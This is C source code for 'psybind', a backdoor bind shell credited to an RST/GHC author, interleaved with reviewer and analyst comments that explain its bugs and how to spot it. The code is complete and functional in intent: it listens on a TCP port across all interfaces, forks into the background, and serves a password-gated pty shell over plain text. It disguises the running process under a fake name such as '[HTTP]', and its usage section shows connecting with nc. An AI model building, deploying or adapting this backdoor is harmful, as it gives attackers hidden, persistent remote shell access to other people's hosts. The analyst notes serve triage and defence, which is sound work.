/*
O O o o . . . . . . . . o o O O
O O
. .
. RST/GHC Pseudo Bind Shell [ psybind.c ] .
. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= .
. [v 1.0.0] .
[Compiling]:
$ gcc -o psybind psybind.c
[Usage]:
$ ./psybind <options>
[Option] [Default] [Description]
-p [7654] Port number
-w [rstghc] Set password
-r [/] Start path
-c [[HTTP]] Fake process name
-s [/bin/bash] Shell(program) path
-h This screen
[Example]:
. Run in Remote Host: .
. $ ./psybind -s /bin/sh -c girl -r /home -w 123 -p 31337 .
. .
. To connect with remote computer: .
o $ nc 127.0.0.1 31337 o
o o
O Code by Dr_UF0_51 (civufo[at]mail.ru) O
O Good luck ;) O
O O o o . . . . . . . . o o O O
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <netinet/in.h>
#include <errno.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <strings.h>
#include <signal.h>
#include <wait.h>
#include <string.h>
/* Relay chunk size: the byte count handed to every read() in main's relay loop. */
#define BUFSIZE 1024
void usage(void);
void waitpd(int);
/* NOTE(review): chpass() is defined at the end of this file but has no
   prototype here, so main reaches it through an implicit declaration
   (rejected by C99 and later compilers). */
/* Banner written to the connecting client once the password check passes.
   For responders: this literal, like the other fixed strings in the file,
   is a static artifact of the compiled binary. */
char motd[] = "\nWelcome to RST/GHC - Pseudo Bind Shell\n\n";
/*
 * Entry point.
 *
 * Parses the command-line options, opens a TCP listener on every local
 * address, forks into the background, and then, for each accepted
 * connection, forks a worker that allocates a pseudo-terminal, prompts for
 * a password on it, and on success replaces itself with the configured
 * program while the worker copies raw bytes between socket and pty master.
 *
 * Analyst notes, all derived from the code below:
 *  - The listener binds INADDR_ANY; the port is 7654 unless -p is given.
 *  - The -c value (default "[HTTP]") is passed as argv[0] of the spawned
 *    program, so the name shown in a process listing need not match the
 *    executable path. Compare the displayed name with the real executable
 *    when triaging.
 *  - Password and session bytes cross the socket unmodified; nothing in
 *    this file encrypts or authenticates the transport.
 *  - The fixed strings ("Password: ", the motd banner, the "Shell Started.."
 *    message) are static artifacts of the binary.
 *
 * Exit codes 1-8 identify the setup step that failed; see each call site.
 */
int main(int arg, char **param)
{
int sd, nread, datas, td, i, dn, pid;
// NOTE(review): 0x10 is presumably sizeof(struct sockaddr_in); accept()
// expects a socklen_t *, not an int *.
int sins = 0x10; // Size
// NOTE(review): ptyn later receives the char * returned by ptsname(); an int
// cannot hold a pointer where pointers are wider than int.
int ptym, ptyn;
struct sockaddr_in saddrs;
struct sockaddr_in saddrd;
struct termios terms;
fd_set fds;
// NOTE(review): arrays of pointers, not of bytes. Both are used below as raw
// byte buffers, so they are sizeof(char *) times larger than their element
// counts suggest.
char *buffer[BUFSIZE];
// NOTE(review): getopt() returns int; c is a plain char (see the loop below).
char *password[255], c;
int port = 7654; // Port number
char pass[255] = "rstghc"; // Password
char path[255] = "/"; // Start path
char cmdname[255] = "[HTTP]"; // Fake process name
char shell[255] = "/bin/bash"; // Program [shell]
/* Arguments */
// NOTE(review): the end-of-options value -1 is stored in a char before the
// "> 0" test; where plain char is unsigned it becomes 255 and the loop would
// not terminate. An unrecognised option ('?') matches no case and is ignored.
while(( c = getopt(arg, param, "p:w:c:r:s:h")) > 0)
switch(c)
{
case 'p':
// atoi() reports no errors; non-numeric input yields 0, which the range
// check below rejects.
port = atoi(optarg);
break;
case 'w':
// NOTE(review): here and in the three cases below, strncpy() with the full
// buffer size leaves the destination unterminated when the argument is 255
// bytes or longer.
strncpy(pass, optarg, 255);
break;
case 'c':
strncpy(cmdname, optarg, 255);
break;
case 'r':
strncpy(path, optarg, 255);
break;
case 's':
strncpy(shell, optarg, 255);
break;
case 'h':
usage();
exit(0);
break;
}
/* Port check */
// NOTE(review): '|' is a bitwise OR of two 0/1 comparison results, so it
// behaves like '||' here. The message says "< 65535" although 65535 itself
// is accepted.
if( port > 65535 | port < 1)
{
fprintf(stderr, "Error: Ports must be > 0 and < 65535\n");
exit(1);
}
/* Create the socket address structure */
bzero(&saddrs, sizeof(saddrs));
saddrs.sin_family = AF_INET;
saddrs.sin_port = htons(port);
// INADDR_ANY: the listener is reachable on every local IPv4 address.
saddrs.sin_addr.s_addr = INADDR_ANY;
/* Create the socket */
if(( sd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
{
fprintf(stderr, "Error[%d]: Creat Socket Failed\n", errno);
exit(2);
}
/* Bind Port */
if( bind(sd, (struct sockaddr *)&saddrs, sizeof(saddrs)) < 0)
{
fprintf(stderr, "Error[%d]: Bind Port Failed\n", errno);
close(sd);
exit(3);
}
/* Listen Port */
if( listen(sd, 5) < 0) // Max active connections = 5
{
fprintf(stderr, "Error[%d]: Listen Port Failed\n", errno);
close(sd);
exit(4);
}
/* PID */
// The parent prints the child's pid and exits, leaving the child running in
// the background. NOTE(review): a failed fork() returns -1, which also takes
// this branch, so "pid = -1" is printed and the program exits.
if((pid = fork()) != 0)
{
printf("Shell Started.. [pid = %d] Good luck ;)\n", pid) ;
exit(0);
}
// NOTE(review): the results of chdir() and setsid() are not checked.
chdir(path); // Path
setsid(); // Run in a new session
signal(SIGCHLD, waitpd); // Waitpid
/* Wait Data */
for(;;)
{
// NOTE(review): "> 0" treats a returned descriptor 0 as a failure. The
// unbraced if/else-if chain below is the body of this if.
if(( datas = accept(sd, (struct sockaddr *)&saddrd, &sins)) > 0) // If data accepted, start
// NOTE(review): on fork failure 'continue' skips the close(datas) at the
// bottom of the loop, so the accepted descriptor stays open in the listener.
if((pid = fork()) < 0)
continue;
else if(pid == 0)
{
// Per-connection worker. The listening socket sd is inherited and never
// closed in this process.
/* Open Pseudo - Terminal Master*/
// NOTE(review): getpt() is a GNU extension and presumably needs _GNU_SOURCE
// for a declaration; grantpt() is never called before unlockpt().
if(( ptym = getpt()) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Pseudo - Terminal Master\n", errno);
exit(5);
}
/* Unlock Slave Pseudo Terminal */
if( unlockpt(ptym) < 0 )
{
fprintf(stderr, "Error[%d]: Can't Unlock Slave Pseudo Terminal\n", errno);
exit(6);
}
/* Process Group Id*/
if(setpgid(0, 0) < 0)
{
fprintf(stderr, "Error[%d]: Setpgid Failed\n", errno);
exit(8);
}
// NOTE(review): a pointer is stored in an int here and cast back at open().
ptyn = ptsname(ptym); // Name of the slave pseudo-terminal
// NOTE(review): the result is unchecked; if descriptor 0 is not a terminal,
// terms stays uninitialised and is still handed to tcsetattr() below.
tcgetattr(0, &terms); // Standard input
/* Open terminal */
if(( td = open((char *)ptyn, O_RDWR)) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Terminal Name\n", errno);
exit(7);
}
/* Fork */
// The new child owns the slave side of the pty; this process keeps the
// master side and relays. A fork() failure (-1) is not distinguished from
// the parent case.
if( fork() == 0)
{
if(setsid() < 0)
{
fprintf(stderr, "Error[%d]: setsid Failed\n", errno);
exit(6);
}
tcsetattr(td, TCSANOW, &terms); // Apply the attributes immediately
write(td, "Password: ", 10);
// NOTE(review): reads up to sizeof(password) bytes into an uninitialised
// buffer, ignores the byte count and appends no terminator, yet chpass()
// runs strlen() on the result.
read(td, password, sizeof(password));
// Standard input, output and error now all refer to the pty slave.
dup2(td, 0);
dup2(td, 1);
dup2(td, 2);
/* Check password */
// chpass() returns 0 on acceptance. NOTE(review): password is an array of
// char * passed where chpass() takes char *.
if(!chpass(password, pass))
{
write(td, motd, strlen(motd));
close(td);
// cmdname becomes argv[0] of the new program image. NOTE(review): the
// argument list should end with (char *)NULL rather than a bare 0, and the
// return value of execl() is not checked.
execl( shell, cmdname, 0); // Exec shell
}
// NOTE(review): there is no exit() here. When the check fails or execl()
// returns, this process closes td and then falls through into the relay
// loop below alongside its parent.
close(td);
}
close(td);
// Relay loop: copy bytes both ways between the socket (datas) and the pty
// master (ptym) until either side reports EOF or an error.
for(;;)
{
FD_ZERO(&fds);
FD_SET(datas, &fds); // Set datas for select
FD_SET(ptym, &fds); // Set ptym for select
// NOTE(review): nfds is ptym + 1, which assumes ptym is the higher of the
// two descriptors.
if((i = select( ptym + 1, &fds, NULL, NULL, NULL)) <= 0)// Wait data for select descriptor
break;
if(FD_ISSET(datas, &fds)) // If socket
{
// Clears sizeof(buffer) bytes, which is BUFSIZE * sizeof(char *); the read
// itself is capped at BUFSIZE bytes.
bzero(buffer, sizeof(buffer));
if(( nread = read (datas, buffer, BUFSIZE)) <= 0)
break;
// NOTE(review): a short write is not retried.
if( write(ptym, buffer, nread) <= 0)
break;
}
if(FD_ISSET(ptym, &fds)) // If pty
{
bzero(buffer, sizeof(buffer));
if(( nread = read ( ptym, buffer, BUFSIZE)) <= 0)
break;
if(write(datas, buffer, nread) <= 0)
break;
}
}
close(datas);
close(ptym);
exit(0);
} // fork
// Listener side: drop its copy of the accepted descriptor. This also runs
// with a negative datas when accept() failed.
close(datas);
} // for
}
/** SIGCHLD handler: collect one exited child, if any, without blocking. **/
void waitpd(int i)
{
    (void)i; /* the signal number is not used */

    /* pid -1 matches any child; WNOHANG returns at once when none has exited. */
    (void)waitpid(-1, NULL, WNOHANG);
}
/** Usage: write the banner and the option summary to standard output. **/
void usage(void)
{
    /* Emitted verbatim and in order. The first entry has no trailing
       newline, so the rule after it continues on the same output line. */
    static const char *const screen[] = {
        "\n\t RST/GHC Pseudo Bind Shell",
        "\t =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=\n",
        "\t\t\t\t\t\t\t\tby Dr_UF0_51\n\n",
        "Usage: ./psybind <options>\n",
        "\t-p [7654] Port number\n",
        "\t-w [rstghc] Set password\n",
        "\t-r [/] Start path\n",
        "\t-c [[HTTP]] Fake process name\n",
        "\t-s [/bin/bash] Shell(program) path\n",
        "\t-h This screen\n",
    };
    size_t row;

    for (row = 0; row < sizeof screen / sizeof screen[0]; row++) {
        fputs(screen[row], stdout);
    }
}
/**
 * Check Password.
 *
 * str1 is the line read from the client, str2 the configured password.
 * Returns 0 when the input is accepted and 1 when it is rejected (the caller
 * tests !chpass(...)).
 *
 * NOTE(review): as written this is not an exact string comparison:
 *  - the first condition uses '=' rather than '==', so it always overwrites
 *    the last byte of str1 with 0x0d and always evaluates true; k is
 *    therefore always 2;
 *  - only the first strlen(str1) - k bytes of str1 are compared with str2,
 *    and the length of str2 is never consulted;
 *  - strlen(str1) - k is evaluated as an unsigned value and wraps when str1
 *    is shorter than k; with an empty str1, strlen(str1) - 1 indexes before
 *    the start of the buffer.
 * When assessing a host running this program, do not count the password as
 * a meaningful access control on the listener.
 */
int chpass(char *str1, char *str2)
{
int i, s1 = 0, k = 1;
// Intended to detect a trailing carriage return; actually an assignment.
if(str1[strlen(str1) - 1] = 0x0d) k++; // if telnet
// Stops at the first differing byte. strlen() is re-evaluated on every pass.
for(i = 0; i < strlen(str1) - k; i++)
if( str1[i] != str2[i] )
{
s1 = 1;
break;
}
// Rejects input that consists only of the k trailing bytes.
if( strlen(str1) == k ) s1 = 1; // If ENTER pressed
return(s1);
}